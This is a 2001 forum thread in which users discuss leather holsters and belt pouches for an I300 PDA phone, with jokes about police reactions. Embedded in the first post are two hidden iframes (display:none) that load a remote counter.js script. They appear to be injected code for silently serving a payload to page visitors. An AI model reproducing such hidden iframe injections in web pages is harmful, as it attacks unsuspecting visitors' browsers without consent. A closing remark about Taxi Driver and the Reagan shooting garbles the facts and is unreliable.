+ Reply to Thread

Thread: A Holster?

A Holster?

Don't know if anybody else has mentioned these but I just happened onto their site.

http://www.eholster.com/index.html

Not so sure about the holster thing but it may work for some people.

I do like the horizontal E-Pouch though. Now if I could get it without the D rings and just have leather straps to loop your belt through it might be perfect.

The I300's outside dimensions are 6 1/8" (2 5/16" + 3/4" X 2) so the medium size cellphone E-Pouch would be the closest with a 6" inside dimension. The height is only 1/4" difference.

Anyone with some opinions on this before I start whipping out the plastic.

Skip <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by Skip; 12-30-2001 at 11:14 AM.

Administrator

Arrow

has ont been mentioned on this site but i have mentioned it on other sites relating to the 6035..

i thnk they are a cool... but a little pricey on some...

are you familliar with the E and B case thats already out?

Talk about paranoid!!! Wow, it would certainly be difficult for any chaps to get their hands on yor bloody prized gadgets with that hardware protection!

Marctronixx,

I have check out the E&B cases but since I'm in and out of the vehicle all day, I was waiting for an alternative that wouldn't come off when it gets jammed into the seat belt like my old phone.
    Right now I use the stick-on button with a belt clip but it's only good in the office and that's with constant attention to not scratching the screen. Also, the plastic back on the I300 looks like a weak spot if there happened to be a collision with anything.

The button works well with the dashboard clip but sooner or later I'll probably forget to take it off my belt before getting into the truck and well.... something is gonna' break.

Skip

Administrator

Arrow

yeah i hear ya.,..

im using the tar-chez (target) sanyo leather case... works well but the clip is a little weak... but at 10 bucksa.. a great deal...

Oh, and don't try wearing that Holster rig to the airport!

Skip

Yeah, I'd be worried about the implications of having one of these while anywhere near a police officer.

Scott

Administrator

Arrow

why worry... if you dont have anything illegal, then what would be the issue?

Marctronixx, I'm just picturing myself opening up my jacket and reaching for my PDA which is strapped under my armpit and a cop shooting first and playing Bubblets later.

Scott

Administrator

Arrow

well to each his own... but im not paranoid like that.. if you were to have this on and you were about to take your jacket off or whatever... tell the cop or whoever what you have and that will diffuse the situation.. we cant go thru life thinking "..what if..." all the time...

no disrespect to you but that is my feelings on it... :o

do they make a version so you can strap your phone and palm to your ankles?

Brooks

Hey Marctronixx, I was just joking you know.

Scott

fikse, actually that makes me think of a really useful idea to the whole "gun" concept. I seem to remember in a couple of western movies (or maybe Wild, Wild, West) a guy who would have this contraption strapped to his wrist which would at the flick of a wrist send a little gun out and ready to be grabbed. Imagine having your Palm strapped to one of those?

Scott

Administrator

Arrow

scott i think that would be "taxi driver" ( i think thats the name) with deniro. ya know, that movie william hinkley used to shoot president reagon back on the day..:p